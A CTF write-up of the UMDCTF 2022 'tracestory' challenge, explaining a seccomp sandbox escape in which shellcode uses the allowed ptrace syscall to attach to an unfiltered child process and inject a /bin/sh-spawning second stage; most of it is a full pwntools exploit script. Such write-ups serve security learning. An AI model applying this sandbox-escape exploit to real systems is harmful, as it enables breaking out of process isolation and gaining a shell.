seccomp jail escape using ptrace

Here's a short writeup on the seccomp jail escape in UMDCTF 2022 (tracestory).

I'll skip the reversing part since it was pretty straight forward. The binary forks before setting up seccomp and reading in shellcode from stdin. It allows us to use the following syscalls in our shellcode:

❯ seccomp-tools dump ./trace_story
[DEBUG] child pid: 7816
Input:
shellcode go here
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x18 0xc000003e  if (A != ARCH_X86_64) goto 0026
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x15 0xffffffff  if (A != 0xffffffff) goto 0026
 0005: 0x15 0x13 0x00 0x00000003  if (A == close) goto 0025
 0006: 0x15 0x12 0x00 0x00000004  if (A == stat) goto 0025
 0007: 0x15 0x11 0x00 0x00000005  if (A == fstat) goto 0025
 0008: 0x15 0x10 0x00 0x00000006  if (A == lstat) goto 0025
 0009: 0x15 0x0f 0x00 0x0000000a  if (A == mprotect) goto 0025
 0010: 0x15 0x0e 0x00 0x0000000c  if (A == brk) goto 0025
 0011: 0x15 0x0d 0x00 0x00000015  if (A == access) goto 0025
 0012: 0x15 0x0c 0x00 0x00000018  if (A == sched_yield) goto 0025
 0013: 0x15 0x0b 0x00 0x00000020  if (A == dup) goto 0025
 0014: 0x15 0x0a 0x00 0x00000021  if (A == dup2) goto 0025
 0015: 0x15 0x09 0x00 0x00000038  if (A == clone) goto 0025
 0016: 0x15 0x08 0x00 0x0000003c  if (A == exit) goto 0025
 0017: 0x15 0x07 0x00 0x0000003e  if (A == kill) goto 0025
 0018: 0x15 0x06 0x00 0x00000050  if (A == chdir) goto 0025
 0019: 0x15 0x05 0x00 0x00000051  if (A == fchdir) goto 0025
 0020: 0x15 0x04 0x00 0x00000060  if (A == gettimeofday) goto 0025
 0021: 0x15 0x03 0x00 0x00000065  if (A == ptrace) goto 0025
 0022: 0x15 0x02 0x00 0x00000066  if (A == getuid) goto 0025
 0023: 0x15 0x01 0x00 0x00000068  if (A == getgid) goto 0025
 0024: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0026
 0025: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0026: 0x06 0x00 0x00 0x00000000  return KILL

Most importantly we have very few useful syscalls besides ptrace, we can't even write/read to files! Luckily, ptrace can do quite a few things like pausing execution, reading/writing to memory and so on.

So we need to somehow take control of the forked process and execute some shellcode there without the limitations imposed by seccomp. Thus we have two stages to our exploit:

  1. Take control over the forked process. Also known as attach in ptrace parlance.
  2. Find the instruction pointer.
  3. Write our second stage to its location.
  4. Continue exection.

The first and second steps are outlined below. They are assembled with pwntools, but that is ommitted in the listing.

/* ptrace_attach */
/* Will pause the execution of the child process and attach ptrace */
mov rax, 101;
mov rdi, 16;
mov rsi, {child}; /* We are given the PID in stdout! */
mov rdx, 0;
mov r10, 0;
syscall;

/* getregs syscall(SYS_ptrace, PTRACE_GETREGS, child, 0, rsp+100) */
/* Writes register values from the child to [r10], this is
   how we find the instruction pointer                            */
sub rsp, 512; /* Didn't bother calculating the right size, prolly 120 */

mov rax, 101;
mov rdi, 12;
mov rsi, {child};
mov rdx, 0;
lea r10, [rsp + 100];
syscall;

/* set r12 to rip (child rip) */
mov r12, [rsp + 100 + 128];
Warning! CTF-level code quality

Before we write the second stage to the child process we need a second stage. In this case I quickly took it from shell-storm.org.

/* nop sled */
push   0x42
pop    rax
inc    ah
cqo
push   rdx
movabs rdi, 0x68732f2f6e69622f
push   rdi
push   rsp
pop    rsi
mov    r8, rdx
mov    r10, rdx
syscall
/* nop sled */
Second stage payload that is written to the child process.

We also need to use ptrace to write our payload. Annoyingly, it has to be done in chunks of 4 bytes at a time, each written using a syscall.

write_bytes = ""
for i in range(0, len(child_shcode), 4):
	write_bytes += f"""
	mov rax, 101;
	mov rdi, 4;
	mov rsi, {child};

	/* Memory location to write to */
	mov rdx, [rsp + 100 + 128];
	add rdx, {i};

	/* Payload bytes */
	mov r10, {u32(child_shcode[i:i+4].rjust(4,b"0"))};
	syscall;

	add r12, 4; /* r12 came in handy here */
	"""
shellcode_a += asm(write_bytes)
Writing the second stage payload to the child process.

Now that we have written the second stage to the instruction pointer of the second stage all that is left is to restart execution. To avoid killing the child process we leave the parent process in an infinite loop.

/* detach ptrace and restart execution */
mov rax, 101;
mov rdi, 17;
mov rsi, {child};
mov rdx, 0;
mov r10, 0;
syscall;

/* yield */
mov eax, 1
loop:
test eax, 1
jne loop;

/* exit cleanly */
mov rax, 60;
mov rdi, 0;
syscall;

Profit! We have a shell (or can do whatever else we want by modifying the second stage).

Below is a full listing of the exploit:

from pwn import *
from pwnlib import util

elf = context.binary = ELF("./trace_story")
context.local(os = 'linux', arch = 'amd64')

#p = process(elf.path)
p = remote("0.cloud.chals.io", 15148)
p.recvuntil(b": ")
child = int(p.recvuntil(b"\n")) # get child pid
p.recvline()

log.info(f"Child PID: {child}")

# Second stage, spawns shell
child_shcode = asm("nop; " * 200 + """
push   0x42
pop    rax
inc    ah
cqo
push   rdx
movabs rdi, 0x68732f2f6e69622f
push   rdi
push   rsp
pop    rsi
mov    r8, rdx
mov    r10, rdx
syscall
nop;
nop;
nop;
nop;
nop;
nop;
nop;
nop;
nop;
nop;
nop;
nop;
nop;
""")

# rdi rsi rdx r10 r8 r9   res rax
shellcode_a = asm(f"""
nop;
nop;
nop;
nop;

/* ptrace_attach */
mov rax, 101;
mov rdi, 16;
mov rsi, {child};
mov rdx, 0;
mov r10, 0;
syscall;

/* getregs syscall(SYS_ptrace, PTRACE_GETREGS, child, 0, rsp+100) */
sub rsp, 512; /* Cant be bothered calculating the right siz, prolly 120 */

mov rax, 101;
mov rdi, 12;
mov rsi, {child};
mov rdx, 0;
lea r10, [rsp + 100];
syscall;

/* set r12 to rip */
mov r12, [rsp + 100 + 128];
""")


# Generate second stage
write_bytes = ""
for i in range(0, len(child_shcode), 4):
	write_bytes += f"""
	mov rax, 101;
	mov rdi, 4;
	mov rsi, {child};

	mov rdx, [rsp + 100 + 128];
	add rdx, {i};

	mov r10, {u32(child_shcode[i:i+4].rjust(4,b"0"))};
	syscall;

	add r12, 4;
	"""
shellcode_a += asm(write_bytes)

shellcode_a += asm(f"""
/* setregs */

mov rax, 0x0;
mov [rsp + 100 + 80], rax
mov rax, 0x0;
mov [rsp + 100 + 96], rax

/* rip */
mov rax, [rsp + 100 + 128]; 
add rax, 2;
mov [rsp + 100 + 128], rax


/* syscall(SYS_ptrace, PTRACE_SETREGS, child, 0, rsp+100) */
mov rax, 101;
mov rdi, 13;
mov rsi, {child};
mov rdx, 0;
lea r10, [rsp + 100];
syscall;

/* detach */
mov rax, 101;
mov rdi, 17;
mov rsi, {child};
mov rdx, 0;
mov r10, 0;
syscall;

/* yield */
mov eax, 1
loop:
test eax, 1
jne loop;

/* exit */
mov rax, 60;
mov rdi, 0;
syscall;
""")


log.info(f"Shellcode siz is {len(shellcode_a)}")

p.sendline(shellcode_a)
p.interactive()